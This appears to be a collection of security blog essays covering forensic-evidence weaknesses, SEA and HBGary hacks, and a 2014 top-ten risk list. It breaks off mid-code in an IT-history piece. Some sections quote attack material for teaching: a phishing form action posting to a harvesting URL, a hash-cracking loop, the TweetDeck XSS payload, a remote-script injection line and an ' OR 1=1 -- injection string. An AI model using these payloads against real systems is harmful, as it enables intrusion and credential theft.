Crime Scenario 5 (Defence: My computer automatically went to it). In this case, Bob has been detected by his ISP accessing criminal material. He is arrested, and says that he knew very little about it: he tried to access his bank but ended up viewing the criminal material. For this one, we have to look at domain name servers (DNS) and Internet gateways. Unfortunately, the Internet has been created with very little credibility checking of the information that is passed. So when Bob starts his computer, Eve broadcasts the MAC address of her computer, and pretends to be his Internet gateway and also his DNS server. All Bob knows is that when he accesses his bank, he sees the wrong site. In fact, Eve has poisoned his domain name look-ups, and she resolves his domain requests to the wrong IP address, which is logged by the ISP.

Crime Scenario 6 (Defence: I didn’t send the email). In this case Bob has been sending abusive emails to Alice, and she forwards them to the Police, saying that he is abusing her. Bob is then arrested, and says that he knew nothing about it. In this case, the email system we have has no built-in credibility, and anyone can send an email claiming to be anyone they want. Thus Eve uses her own SMTP server, within a private network, to send the email. In fact the email contents just contain headers of:

To: Alice@test.com
From: Bob@test.com

and there is no way of actually telling whether it was from Bob. So? Email really can’t be used as a fully credible source of evidence. It can be used for a timeline, but you cannot ever confirm that the sender is actually who the “From:” field says.
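To show just how weak the From: field is, this sketch builds a perfectly well-formed message claiming to come from Bob, using only Python’s standard library (it constructs the message rather than sending it; SPF, DKIM and DMARC are the modern countermeasures, but nothing in basic SMTP checks this header):

from email.message import EmailMessage

msg = EmailMessage()
msg["To"] = "Alice@test.com"
msg["From"] = "Bob@test.com"     # nothing in SMTP itself verifies this claim
msg["Subject"] = "You will regret this"
msg.set_content("Any SMTP server Eve controls will happily relay this.")

print(msg.as_string())           # headers look exactly like a genuine mail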

Conclusions

Very little of what is generated on a computer or network is actually 100% credible. Basically, if someone wants to change things on the Internet, or on computers, they can do so. I appreciate that many of the crimes investigated as cybercrime carry serious threat levels, but that does not justify reducing the threshold of the evidence. To pin-point someone from an IP address (or even a MAC address), when they are using a shared home network, is not really any form of credible evidence, and can only provide one piece of the picture around a crime.

Text from the article

POLICE have called for the abolition of a key plank of Scots law in order to help secure convictions for online crimes such as child pornography and grooming.

Officers say the need to corroborate key facts to bring a case to court is limiting their ability to tackle cyber crimes, which include paedophilia, harassment and online fraud.

But online experts have warned that digital trails of evidence can be unreliable on their own and need to be corroborated by others forms of evidence to prevent miscarriages of justice.

Police Scotland officers struggle to find corroborating evidence when acting on allegations of online crime brought by members of the public.

Assistant Chief Constable Malcolm Graham said: “It’s an emerging crime type where the likelihood of getting corroboration for essential facts diminishes.

“A lot of cases that come through the courts are where police have proactively monitored people, where we think there’s a risk that children might be abused.

“But in cases where people come and report to us that they have been the victim of cyber crime, there can be issues in terms of attributed communications hardware.

“We believe the law should develop to keep in touch with technology. This would be an example where current legislation has not developed and evolved in recognition of the range of criminal operations.”

Police Scotland supports the Scottish Government’s plans to abolish the requirement to have corroboration in order to bring a case to court.

The legislation, which is being debated in the Scottish Parliament, is based on recommendations by Lord Carloway, the Lord Justice Clerk, which are opposed by other Scottish judges and leading lawyers.

Professor Bill Buchanan, director of Edinburgh Napier University’s centre for distributed computing, networks, and security, which trains police in tackling cyber crime, also warned against abolishing the need for corroboration.

“On the internet it’s very difficult to take one source of evidence as a definitive source as things can be changed and people can have different identities,” he said.

“We should always get some physical and some traditional corroboration, along with the digital footprint.

“Logs can be tampered with, you have an IP address, but people can spoof them.”

A UK expert on online crime said that more funding, rather than a change in the law, was needed.

David Cook, a cyber crime and data security solicitor, said: “Our prosecutors find it notoriously difficult to adequately evidence crimes that occur online and the vast majority go not only without prosecution but even without a proper investigation.

“However an effective investigation can and should still take place. That those who police us choose to not provide adequate resources to such matters, instead suggesting the erosion of a civil liberty that is centuries old, is a lamentable position.

“I fear that such a change would inevitably cause an increase in the number of miscarriages of justice,” he added.

Police Scotland estimates that 3,000 more victims will be granted access to justice by abolishing the need for corroboration.

In a separate study, the Crown Office looked at 458 rape allegations which did not reach court because of insufficient evidence. They were re-examined as if corroboration was not required and prosecutors estimated 82 per cent could have proceeded to trial, and 60 per cent had a reasonable prospect of conviction.

Police Scotland has not yet produced similar research on what impact removing the requirement would have on cyber crime.

Alison McInnes MSP, Scottish Liberal Democrat justice spokeswoman, said: “This is a new argument which has certainly not been reflected in the wide range of evidence given to the justice committee. If Police Scotland believe that corroboration has impeded cases such as these then I am surprised that they have not reflected that in their oral evidence to the committee.

Abolition call: Cadder ruling

The proposed abolition of corroboration – the requirement to have two independent pieces of evidence to bring a case to court – stems from a Supreme Court judgment in 2010.

The UK’s highest criminal court found in favour of Peter Cadder by ruling that it was a human rights breach for police to interview suspects without giving them access to a solicitor. This has led to more suspects refusing to speak in interviews.

This is particularly problematic for police in cases of alleged rape. Previously an accused may have admitted having sex but claimed it was consensual, which would have allowed police to corroborate a key element of the charge.

In light of the Cadder ruling, the Scottish Government asked Lord Carloway, now Scotland’s most senior judge, to review Scots law. Carloway made a raft of recommendations, including abolishing the need for corroboration. The proposal is in a criminal justice bill now in front of the Scottish Parliament.

Forget Bombs and Guns … this is the new Battle Field

Introduction

As we have seen in Russia’s suspected cyber attack on Web sites in Estonia, and in the Arab Spring uprising, the Internet is playing an increasing part in conflicts around the world. As we move into an Information Age, the battlefield of the future is likely to be in cyberspace, which will also be the place where nation states struggle to control news outlets.

Over the centuries, information has often been controlled by traditional media outlets, where whether organisations and individuals are seen as threats is generally defined by the government of the time. On the Internet, national boundaries have become blurred, and the control that any nation has over dissemination on the Internet has been eroded, especially with the openness of platforms such as Twitter and Facebook, and of news Web sites. This article outlines how the Syrian Electronic Army (SEA), a pro-Assad group of “hacktivists”, with its limited resources, managed to compromise one of the leading news agencies in the world, not by directly compromising its site, but through an associated one. This expands the scope of compromises beyond sites operated by organisations to their trusted partners.

Reuters Hack

Over the weekend (at 12 noon on Sunday 22 June 2014) this was highlighted by the SEA redirecting Reuters users to a page which stated:

Stop publishing fake reports and false articles about Syria! UK government is supporting the terrorists in Syria to destroy it. Stop spreading its propaganda.

The target, though, was not the Reuters site itself, but content it hosted, which is used by many other media outlets. This has happened in other related hacks, such as with the New York Times, where the SEA went after the domain name servers of the New York Times and Twitter, through the registry records of Melbourne IT. Thus when a user wanted to go to the New York Times site, they were redirected to a page generated by the SEA.

In the case over the weekend, the web advertising site Taboola was compromised, which could have serious consequences for its other clients, who include Yahoo!, the BBC and Fox News. With the increasing use of advertising material on sites, it will be a great worry to many sites that messages from hacktivists could be posted through them. Previously, in 2012, Reuters was hacked by the SEA, who posted a false article on the death of Saudi Arabia’s foreign minister Saud al-Faisal.

In a previous hack on The Onion, the SEA used one of the most common methods of compromise: a phishing email. With this, a person in the company clicked on a malicious link for what seemed to be a lead story from the Washington Post. Unfortunately it redirected to another site and then asked for Google Apps credentials. After that, the SEA gained access to the Web infrastructure and managed to post a story.

It is possible that this attack on Reuters was based on the same type of compromise, as it is fairly easy to target key users and trick them into entering their details. Often the phishing email can even replicate the local login to an intranet, but it is actually a spoofed version. In the case of The Onion, the SEA even gained access to its Twitter account.

In classic form, The Onion, on finding the compromise, posted an article leading with:

Syrian Electronic Army Has A Little Fun Before Inevitable Upcoming Death At Hands of Rebels

While it took a while for The Onion to understand what had happened on its network, Reuters detected the compromise quickly, and within 20 minutes the content had been fixed.

A cause or a fight?

Organisations need to understand that there are new risks within the Information Age, and new ways to distribute messages, especially from those skillful enough to disrupt the traditional forms of dissemination. Thus hacktivism can become a threat to any nation state or organisation (Figure 1).

Figure 1: Security is not just technical; it is also political, economic, and social

The important thing to note about hacktivism is that the viewpoint on the hacktivist often reflects the political landscape of the time, and that time itself can change this viewpoint. While Adolf Hitler and Benito Mussolini are still rightly seen as agents of terror, Martin Luther King and Mahatma Gandhi are now seen as freedom fighters. Thus viewpoints often change, and for some the hacktivist can have the image of a freedom fighter.

Figure 2: Hacktivism

Big v Little

The Internet supports a voice for all, and there are many cases of organisations and nation states upsetting groups around the world, which have successfully rebelled against them. In 2011, Tunisian Government web sites were attacked over Wikileaks censorship, and in the same year the Sony PlayStation Network was hacked after Sony said it would name and shame the person responsible for jailbreaking its consoles (Figure 3). Just because you are small on the Internet doesn’t mean you cannot have a massive impact: Sony ended up losing billions from its share price, and lost a great deal of customer confidence.

Figure 3: Hacktivism examples

HBGary Federal

The HBGary Federal example is the best one in terms of how organisations need to understand their threat landscape. Aaron Barr, the CEO of HBGary Federal, announced that he would unmask some of the key people involved in Anonymous, and contacted a host of agencies, including the NSA and Interpol. Anonymous bounced a message back saying that he shouldn’t do this, or they would go after him. As HBGary Federal was a leading security organisation, they thought they could cope with this, and went ahead with the threat.

Anonymous then searched around on the HBGary CMS system, and found that a simple PHP request of:

http://www.hbgaryfederal.com/pages.php?pageNav=2&page=27

gave them access to the complete database of usernames and hashed passwords for the site. As the passwords were not salted, it was an easy task to reverse-engineer the hashes back to the original passwords. Their targets, though, were Aaron Barr and Ted Vera (COO), each of whom used a weak password of six characters and two numbers, which is easily broken.
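A hedged sketch of why unsalted hashes and short passwords fail (the target hash below is a hypothetical stand-in, not the real one): with no salt, every guess can be checked directly against the whole leaked table, or simply looked up in a precomputed rainbow table. A dictionary is shown here for brevity; exhausting the full ‘six letters plus two digits’ space is also feasible with fast hashes such as MD5:

import hashlib

# Hypothetical unsalted MD5 hash pulled from a leaked user table
target = hashlib.md5(b"aaronb99").hexdigest()

words = ["password", "hbgary", "aaronb", "security"]
for word in words:
    for n in range(100):                 # the two trailing digits
        guess = f"{word}{n:02d}"
        if hashlib.md5(guess.encode()).hexdigest() == target:
            print("cracked:", guess)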

Now that they had the login details, Anonymous moved on to other targets. Surely the pair wouldn’t have used the same passwords for their other accounts? But when Anonymous tried, they got access to a whole range of accounts using the same passwords (including Twitter and Gmail). This gave Anonymous access to GBs of R&D information. Then they noticed that the system administrator for the company’s Gmail account was Aaron, and managed to gain access to the complete email system, which included the email system of the Dutch Police.

Figure 4: Access to email and a whole lot more.

Finally they went after the top security expert: Greg Hoglund, who owned HBGary. For this they sent him an email, from within the compromised Gmail account, posing as a system administrator and asking for confirmation of a key system password, which Greg duly sent back. Anonymous then went on to compromise his accounts, which is a lesson for many organisations. While HBGary Federal has since been closed down, due to the adverse publicity around the hack, the partner company (HBGary) has gone from strength to strength, with Greg making visionary presentations on computer security around the world.

Figure 5: Greg’s compromise.

 

Conclusions

A likely focus of the intrusion is a spear phishing email, where users are tricked into entering their user details, allowing the intruder to gain access to privileged systems. The worry with this compromise is that the Reuters site integrates over 30 third-party/advertising network agencies into its content, and a breach of any of these could compromise the whole infrastructure.

I am a technologist and not a political analyst, so I won’t make any political judgments around hacktivism, but HBGary shows us a few things:

  • Use strong passwords.
  • Never re-use passwords.
  • Patch systems.
  • Watch out for social engineering.
  • Beware of unchecked Web sites.
  • Get an SLA (Service Level Agreement) from your Cloud provider. Organisations need to react quickly to a data breach, especially for email, and an SLA should state how quickly the Cloud provider will react to requests for a lockdown of sensitive information, along with providing auditing information to trace the compromise.
  • Don’t store emails in the Cloud.
  • Test your Web software for scripting attacks.

And as for the Internet providing mechanisms for those with a grievance to air their viewpoint: some would say that individuals have the right to give their viewpoints, while others will say that those viewpoints are a threat against society, so it’s important for us all to make up our own minds, and to assess each case on its merits.

Top 10 Real Security Risks of 2014

Introduction

There are lots of Top 10 security risk lists for the year, so I thought I’d collect mine, and give a few that are maybe obvious, and some that are not so much. We have been through many phases of security risks, from worms and viruses, and now we are seeing more targeted attacks, with a focus, typically, on getting user details. The following are some key security risks for both society and users.

Top 10 Real Security Risks

So here are the Top 10 Security Risks, in order of importance:

1. Spear Phishing. I’ve put this one at Number 1, as it is one of the most significant risks at the current time: you can put all the security in place that you like, but if a user clicks on a link carrying a piece of malware, there’s not much any defence can do. The spear part is significant, as spamming is increasingly targeted, moving from merely knowing that your email address is active to a targeted email which matches the bank that you use. As you can see in Figure 1, this phishing email actually looks quite valid, and the senders have avoided using a hyperlink in the body of the email (thus avoiding a tell-tale rollover on the link). In this case the tricking of the user is done in the attached HTML file, which tends to be treated as a less malicious attachment type than others, such as Word documents and Flash files. When the user clicks on the HTML file they are greeted with a nicely formatted page which looks exactly like the HMRC page. This is a carbon copy, as they have scraped the page from the real site, and then changed one small thing:

<form action="http://eneperi.com/Eusk/done.php" name="processForm" method="POST" 
onsubmit="return submitIt(this)">

which will submit all the details you have entered to http://eneperi.com/Eusk/done.php. As you may expect, it doesn't exist anymore, as the harvesting agent is long since gone.

Figure 1: Example of a spear phishing email.
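As a quick defender-side check, you can scan a suspicious HTML attachment for exactly this trick. Here is a minimal Python sketch (my own illustration, not the scammers' code); the file name and the expected domain are assumptions:

# Minimal sketch: flag any <form> in a saved HTML attachment whose action
# posts outside the domain the page claims to belong to.
from html.parser import HTMLParser
from urllib.parse import urlparse

EXPECTED_DOMAIN = "hmrc.gov.uk"  # assumption: the site the page pretends to be

class FormActionScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.suspicious = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "form":
            return
        action = dict(attrs).get("action") or ""
        host = urlparse(action).hostname or ""
        # Any absolute form action pointing off-domain is worth flagging
        if host and not host.endswith(EXPECTED_DOMAIN):
            self.suspicious.append(action)

scanner = FormActionScanner()
with open("attachment.html", encoding="utf-8", errors="ignore") as f:
    scanner.feed(f.read())

for action in scanner.suspicious:
    print("Form posts off-domain:", action)

Run against the page above, this would flag the http://eneperi.com/Eusk/done.php action immediately.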

2. Unpatched Systems. Apart from users clicking on links, which most systems can do very little about, it is unpatched systems which give us the greatest threat. With these, there can be a well-known vulnerability, for which someone has written a piece of software to exploit it. This is just what happened with Heartbleed, where a vulnerability was found in the protocol used for the heartbeat signal between two systems in a secure connection. Within hours, the Internet was full of Python scripts which exploited the vulnerability, and which anyone from homeland defence agents to script kiddies could use. After this, it was just a matter of finding systems to exploit. So for many administrators it is a continual fight to patch and fix problems. But it is home users who are typically the sloppiest, and it is three main threats which expose them most: CVE-2013-5331 (Adobe Flash), CVE-2007-0071 (Adobe PDF) and CVE-2013-1723 (Java). If a user has an unpatched system, they can be exposed to each of these vulnerabilities. The threats are fairly easy to implement for script kiddies using exploit kits such as the Phoenix Exploit Kit v2.5, which has all the scripts required to create the documents and the code required to exploit the user's machine (Figure 2). There's a whole industry in exploit kits, where, for a maintenance fee, the Exploit Kit creators will patch their exploits to make use of the most up-to-date vulnerabilities, and try to overcome some of the patches applied by vendors.

Figure 2: Unpatched systems.
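There is nothing clever about checking your own exposure, either. Here is a minimal sketch which flags components older than a patched baseline; the version numbers and the inventory are purely illustrative assumptions, not real advisories:

# Minimal sketch: compare installed component versions against a baseline.
MINIMUM_SAFE = {            # hypothetical patched baselines; check vendor
    "flash": (11, 9, 900),  # advisories for the real fix versions
    "java": (7, 0, 45),
}

def parse_version(text):
    # "11.7.700.202" -> (11, 7, 700, 202), so tuples compare numerically
    return tuple(int(part) for part in text.split("."))

installed = {"flash": "11.7.700.202", "java": "7.0.21"}  # example inventory

for name, version in installed.items():
    if parse_version(version) < MINIMUM_SAFE[name]:
        print(f"{name} {version} is below the patched baseline: update it")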

3. Botnets. It may shock you, but there is a whole army of zombies out there, who are given tasks by their master, and will blindly carry them out with little thought for the bandwidth or processing power they are consuming. What is being created is one of the largest distributed data-harvesting systems ever created, and they are waiting, for you or for whoever wants to communicate with them, to do their harvesting. Many think they are out there just for user details, but there are a whole lot of others harvesting whatever information their master has defined for them. Remember, I can automate a task to do a look-up on a domain name, in order to gain an IP address, by getting a bot to call up a domain name service from a Web site. Here's an example from the logs on my site. For some reason, a bot has decided it wants to get my site to resolve a range of domain names to IP addresses, and tries to call /ip/whois with the correct parameter of site="sitename". The log shows that it gets a 404 message, which means the page does not exist (as I got rid of it), but the bot blindly just keeps going, with a different IP address for every access, so it's very difficult to block:

2014-06-21 00:00:02 10.185.7.7 GET /ip/whois site=studentconference.net 80 - 198.50.161.59   
 Opera/9.80+(Windows+NT+6.2;+Win64;+x64)+Presto/2.12.388+Version/12.16 404 0 0 31
2014-06-21 00:00:07 10.185.7.7 GET /ip/whois site=isaev.info 80 - 71.211.183.241 
 Opera/9.80+(Windows+NT+6.2;+Win64;+x64)+Presto/2.12.388+Version/12.16 404 0 0 140
2014-06-21 00:00:07 10.185.7.7 GET /ip/whois site=gosonicgo.com 80 - 167.88.115.209 
 Opera/9.80+(Windows+NT+6.2;+Win64;+x64)+Presto/2.12.388+Version/12.16 404 0 0 155
2014-06-21 00:00:09 10.185.7.7 GET /ip/whois site=ledgewood.com 80 - 50.23.115.95 
 Opera/9.80+(Windows+NT+6.2;+Win64;+x64)+Presto/2.12.388+Version/12.16 404 0 0 202
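For illustration, here is a minimal Python sketch of how you might spot this pattern in such logs. It assumes W3C-style entries like those above, one entry per line, in a file called access.log; the field positions and the threshold are assumptions:

from collections import defaultdict

ips_per_path = defaultdict(set)

with open("access.log") as f:
    for line in f:
        fields = line.split()
        # Assumed W3C field order: date time server-ip method uri-stem
        # uri-query port username client-ip user-agent status ...
        if len(fields) < 11 or not fields[0][:4].isdigit():
            continue  # skip headers, blanks and wrapped lines
        path, client_ip, status = fields[4], fields[8], fields[10]
        if status == "404":
            ips_per_path[path].add(client_ip)

# Many distinct IPs hammering the same dead page is bot behaviour,
# which is why blocking any single address achieves very little.
for path, ips in sorted(ips_per_path.items()):
    if len(ips) > 100:  # arbitrary threshold
        print(f"{path}: {len(ips)} distinct IPs receiving 404s")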

The Zeus botnet, for example, makes use of the vulnerabilities given at No 2 (unpatched systems: Flash, PDF and Java) to harvest data from the user's machine and gather it within its network, where the user's machine becomes a client for gathering information. This can include screen captures of users entering their password characters when they log into their bank account. As long as there is a compromised machine on the Internet, there will be a botnet. With masses of Windows XP, Windows ME, and so on, with lots of unpatched systems, there will be more places for bots to hide, not fewer. Stopping them is almost impossible, as the code for creating these systems is well known, and it takes very little skill to go ahead and create your own.

4. XSS (Cross-site scripting). Last week, TweetDeck started to spam tweets across the Internet. It was caused by adding a heart symbol (♥) to a tweet, which caused the system to run a script within TweetDeck, send a message to the user, and re-tweet links which had just arrived:

<script class="xss">$('.xss').parents().eq(1).find('a').eq(1).click();
$('[data-action=retweet]').click();alert('XSS in Tweetdeck')</script>♥

This highlights the current problem where Web developers spend very little time analysing user input for malicious code. In its simplest form, a value is taken from the user input and echoed straight to the Web page without checking, so when the user enters:

<script>alert('Oops I have been compromised');</script>

it is then echoed to the page, which, of course, runs it as a piece of JavaScript, and displays a message box with "Oops I have been compromised". A common method of breaching a page is where unchecked user input is used to inject malicious code from a remote site. For example:

<script src="http://1.2.3.4/test.js"></script>

will inject some malicious code from a server at 1.2.3.4 into the page, which can cause a whole range of problems, such as breaching the login requirements for a page (see the demo for this).
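The basic defence is just as simple: encode anything taken from user input before echoing it into the page. A minimal Python sketch using the standard library (the render_comment function is my own illustration):

import html

def render_comment(user_input: str) -> str:
    # html.escape turns < > & " ' into entities, so an injected
    # <script> tag is displayed as text rather than executed.
    return "<p>" + html.escape(user_input, quote=True) + "</p>"

payload = "<script>alert('Oops I have been compromised');</script>"
print(render_comment(payload))
# <p>&lt;script&gt;alert(&#x27;Oops I have been compromised&#x27;);&lt;/script&gt;</p>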

Many Web sites use LAMP – Linux, Apache, MySQL and PHP. This often uses PHP code to send SQL requests to a MySQL database. A typical call to a database is:

SELECT * FROM accounts WHERE username='$admin' AND password='$pass'

and where the user enters "admin" and "password", this gives:

SELECT * FROM accounts WHERE username='admin' AND password='password'

Then an intruder could change this to:

SELECT * FROM accounts WHERE username='admin' AND password='' OR 1=1 -- '

which will always return true for the match. To achieve this, the intruder enters the following as a password:

' OR 1=1 --

and converts this to a URL-encoded string:

%20%27%20%4f%52%20%31%3d%31%20%2d%2d%20

When this is injected into the URL request for the page, it will show all the usernames and passwords in the database. There is an almost infinite number of these exploits, and an intruder will generally play around with a canary (forcing some text into the input and observing what happens).
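The standard defence is a parameterised query, where the driver binds the values instead of splicing them into the SQL string. A minimal sketch, using SQLite for illustration rather than the MySQL/PHP stack described above:

import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE accounts (username TEXT, password TEXT)")
# Password stored in the clear only to keep the injection demo short
conn.execute("INSERT INTO accounts VALUES ('admin', 'password')")

def login(username: str, password: str) -> bool:
    row = conn.execute(
        "SELECT 1 FROM accounts WHERE username=? AND password=?",
        (username, password),  # bound parameters, never concatenated
    ).fetchone()
    return row is not None

print(login("admin", "password"))     # True
print(login("admin", "' OR 1=1 --"))  # False: the payload is just a literal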

5. Scare Stories in the Media. The main headline story on the BBC a few weeks ago was:

People have two weeks to protect themselves from 'powerful computer attack'

and little has happened since. In fact, the Zeus botnet infrastructure has been around for quite a while, happily gathering information on users. So the shocking headline seems to imply that something big is happening, that it can only be contained for two weeks, and that then it'll explode. The headline feels like we are being told that a bomb is going to go off in two weeks, and that you've got that time to get protection in place.

In this case, the Zeus bomb, and all the associated botnets, went off some time ago, and there’s very little that can be done about stopping them. The key thing is that users look after themselves better on-line, and not that there is a single piece of software that can thwart all the Zeus-related threats. As long as there is one unpatched Windows XP system around, there’s a hiding place for a bot. As these bots are using peer-to-peer systems to find their master, the botnet master can appear anywhere, and rally their troops on their harvesting exercises. So grabbing hold of a few bot masters, and strangling them, is not really going to cause any long term damage to their infrastructure. In fact, it almost feels like the Internet is becoming alive, with its own in-built eco-system.

While Heartbleed was real and new, the new threats of the Zeus botnet are not actually new. When it comes down to it, on the Internet, the true threats are the well-known vulnerabilities that are fixed by users patching their systems, and not necessarily by people rushing to update their virus scanners. Patching your system leaves you far less exposed than updating your virus scanner does. So the threat is not a new one, and the "two weeks to an explosion" is really not precise. A stronger message would be to define what a user should watch for in a phishing email (don't click on links in HMRC emails) and to patch your system. In fact, don't click on any email links unless you know they are fully trusted.

The key paper on the Zeus botnet goes back to 2011, when a university research group managed to take over the Zeus network, and analysed the usernames, passwords and credit card details of users. With the latest threat, we are told that someone, somewhere is holding back the tide, that they can only do this for two weeks, and that it will then be unleashed. I think this could be hype, especially in gearing up activity within the security community.

6. Critical Infrastructure Failure. Our dependency on the Internet becomes more apparent every day, and many users and businesses fail to see that access to it, and its services, depends on critical infrastructures. A failure in one part of an interconnected system can cause the whole thing to collapse. An example happened recently when Anonymous took over GoDaddy's domain name service because it supported the Stop Online Piracy Act in the US (a Congressional bill which allows copyright owners to gain court orders to take sites offline for practicing or aiding piracy). It should be remembered that critical infrastructure is anything which the whole system depends on, so electrical power, domain name services, identity services, IP address allocation, networked devices, and so on, are all part of this infrastructure, and need to be protected. The standard approach is to set up a failover, where, if a critical device or server fails, a new one replaces it. This, though, is often a hard sell to the CEO, where a system administrator will be asked, "What benefit does it have?", ... "Well, if one goes down, it replaces it!", ... "Well ... I can't see the business case in that". So it is up to us all to make sure that our critical infrastructure protection is in place, in the same way that we would put in protection in our physical world.

7. Resistance to Change. This might seem a strange one to add, but one of our great threats is a resistance to changing our existing systems because of security problems. This is seen in health and social care in the UK, where there is virtually no access for users to their own health and social care records, and very little governance of the sharing of information across disparate systems. Every headline about health records being breached sets back the agenda of getting systems on-line. Often it is a naive debate, where we have an all-or-nothing approach, but there are so many services which could go on-line now, with low risks associated with them. Our risk is thus to keep all our data behind existing barriers, and not look to re-architect to properly integrate users with their own data. In 2013, in the US, there were over 619 health-care-related incidents, with over 40 million records disclosed. This must be seen as a problem mainly related to the way we have built our systems and where we put the data. Only with a re-think will we be able to keep highly sensitive information under strong security control, and apply lighter controls elsewhere. To be able to view your inoculations, or book appointments with GPs, seems such a trivial thing, and should be a top priority for any modern information nation.

Remember, just because something is a risk is no reason, on its own, to stop its development. There can be so many blockers in the way, and it needs leadership to push against them. One I heard was that it would not be possible to Skype with a GP, as Skype was seen as a security risk. Surely everything is a security risk, and it's a balance of benefit against risk? The risk of an ill person getting on public transport must overrule any small risks around Skype and its associated protocols. In Scotland, the Scottish Government has set a target of 2020 for getting health care records on-line ... the question that must be asked is: why does it take so long, and can't we get some simple things on-line first? From the work we have done, repeat prescriptions and booking appointments with clinicians are two of the most popular on-line services which users want. But ask yourself ... when was the last time you were asked what you wanted from your health care services ... and if the answer is "Never", then you should worry!

8. IP Theft. In the past, the greatest threat was from outsiders probing systems. As firewalls have become smarter, and with the increasing use of NAT (Network Address Translation), which hides the internal network from external access, it has become more difficult to gain a foothold on a system. The greater threat is that once an intruder is inside the network, they can generally move around it, and steal IP (Intellectual Property) with few barriers in their way. Many companies struggle to know exactly what their IP actually is, where it is stored, and how access to it is controlled. Thus, companies need to know where their secrets are stored, especially when they are stored in openly accessible areas, such as Dropbox. A simple username and password is often not sufficient to protect key IP assets, and multi-factor access is key to enhanced protection. Companies also need to avoid using knowledge alone as the barrier for access to an asset. Asking a user for their date of birth these days is almost a null question, as everyone's birthday can be determined from open-source searches. Out-of-band authentication, such as an SMS PIN code sent to a mobile device, is key to verifying user access to sensitive information.
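As an illustration of out-of-band authentication, here is a minimal Python sketch; send_sms() is hypothetical, and the PIN lifetime is an arbitrary assumption. The essential properties are that the PIN is random, short-lived, and delivered over a channel the attacker does not hold:

import secrets
import time

PIN_LIFETIME = 300  # seconds; an arbitrary assumption

def issue_pin():
    pin = f"{secrets.randbelow(1_000_000):06d}"  # 6-digit random PIN
    return pin, time.time() + PIN_LIFETIME

def verify_pin(entered: str, pin: str, expires: float) -> bool:
    # Constant-time comparison, and the PIN dies after its lifetime
    return time.time() < expires and secrets.compare_digest(entered, pin)

pin, expires = issue_pin()
# send_sms(user_mobile, pin)  # hypothetical out-of-band delivery
print(verify_pin("123456", pin, expires))  # almost certainly False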

9. Big Brother. This might not seem an obvious security risk, but the gathering and aggregation of data is becoming simpler, and there are often few barriers within existing public-sector systems to stop users gaining access to privileged information that can be brought together. On the one hand we have the right to privacy, and on the other hand we have risks to society, and many countries are now struggling to balance the two, where a properly defined governance infrastructure could protect the rights of the individual, while also detecting risks around copyright breaches, tax evasion, child protection, and so on. We must worry whenever we see new systems being put in place which gather information, with little discussion of how they are being used, and of how citizens will be integrated into them. Any system which says it is gathering information on citizens because of some generally defined risk must be open to review, to make sure the system itself is secure, and that the gathering is worth it. As we move into an age where data is never really deleted, and where its veracity is rarely checked, we could end up with a whole lot of data that is used for purposes it was not intended for, and that could be incorrect.

10. Lack of Standards in Security Education. The final risk is also a strange one, but just as important as the others. As a personal observation, I've seen too many graduates who seem to have very little understanding of some core principles of security. We have done many job interviews, and have seen PhD and MSc graduates struggle to articulate even the basics of private-key cryptography. This can be likened to an electrician not being able to select the right fuse for a plug, or struggling to calculate the current in a circuit from the applied voltage and resistance. So you may worry about the actual security of our systems, especially their software and hardware infrastructure, where software engineers often get no formal education in cryptography, or even in the basics of hashing passwords.
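For reference, one of those basics, storing a salted, slow hash rather than the password itself, fits in a few lines of standard-library Python (the iteration count here is an assumption; pick it from current guidance):

import hashlib
import hmac
import os

def hash_password(password: str):
    salt = os.urandom(16)  # unique salt per user defeats rainbow tables
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)
    return salt, digest

def check_password(password: str, salt: bytes, digest: bytes) -> bool:
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)
    return hmac.compare_digest(candidate, digest)  # constant-time compare

salt, digest = hash_password("correct horse battery staple")
print(check_password("correct horse battery staple", salt, digest))  # True
print(check_password("password", salt, digest))                      # False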

And those that just missed the Top 10:

  • The evil of the Internet. The Internet we have created is amazing in terms of the access it provides for every citizen in the World, but it also provides a platform for those with a grievance, and for those who do not properly understand the damage that their comments can do to the individuals involved. As cyberbullying starts to be seen as a crime, it should hopefully stop those who post vile comments, and make them understand that the countries of the World are teaming up to try to pinpoint individuals and bring them to justice.
  • Identity Theft. Ask kids about the thing that worries them most on the Internet, and they will often say that it is someone stealing their identity. As we focus increasingly on a single identity, our own identity becomes key, and users must protect it in whatever way possible.
  • Not putting the citizen at the centre of systems. As we re-architect our on-line public services, the citizen must be placed at the centre of the designs, and services must be built around them. Too often in the past, barriers have been put in place because of a lack of computer literacy, but the Apple iPad has changed this, and there are now few reasons not to support on-line systems which integrate not only citizens, but also their families, who are often as much the key carers as other more formal roles.
  • DDoS. Very popular as the tool of choice for many with a grievance against a company, but as high-risk organisations move to 24×7 defence support in Security Operations Centres, the defences are now in place to thwart these.

Top 15 Underachievers in IT

I used to write a lot of books ... but I've moved to creating Web material, which is easier to update. From the past, here's one of the essays I wrote many years ago ...

When it comes to failures, there are no failures really, and it is easy to be wise after the event. Who really knows what would have happened if the industry had taken another route? So instead of the Top 15 failures, I’ve listed the following as the Top 15 under-achievers (please forgive me for adding a few of my own, such as DOS and the Intel 8088):

1. DOS, which became the best-selling, standard operating system for IBM PC systems. Unfortunately, it held the computer industry back for at least ten years. It was text-based and command-oriented, had no graphical user interface, could only access up to 640KB of memory, could only use 16 bits at a time, and so on. Many with a short memory will say that the PC is easy to use and intuitive, but they are maybe forgetting how it used to be. With Windows 95 (and to a lesser extent with Windows 3.x), Microsoft made computers much easier to use. From then on, users could actually switch their computer on without having to register for a higher degree in Computer Engineering. DOS would have been fine, as it was compatible with all its previous parents, but the problem was MAC OS, which really showed everyone how a user interface should operate. Against this competition, it was no contest. So what kept DOS going? Application software. The PC had application software coming out of its ears.

2. Intel 8088, which became the standard processor, and thus defined the standard machine code for PC applications. So why is it in the failures list? Well, like DOS, it's because it was so difficult to use, and was a compromised system. While Amiga and Apple programmers were writing proper programs which used their processors to the maximum extent, PC programs were still using their processor in 'sleepy mode' (8088-compatible mode), and could only access a maximum of 1MB of memory (because of the 20-bit address bus limit of 8088 code). The big problem with the 8088 was that it kept compatibility with its father, the 8080. For this, Intel decided to use segmented memory access, which is fine for small programs, but a nightmare for large programs (basically anything over 64KB).
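To make the pain concrete, here is a small sketch of the segment:offset arithmetic: a 20-bit physical address is built from two 16-bit values, so any structure bigger than a 64KB segment forces segment arithmetic, and many different pairs alias the same byte:

def physical_address(segment: int, offset: int) -> int:
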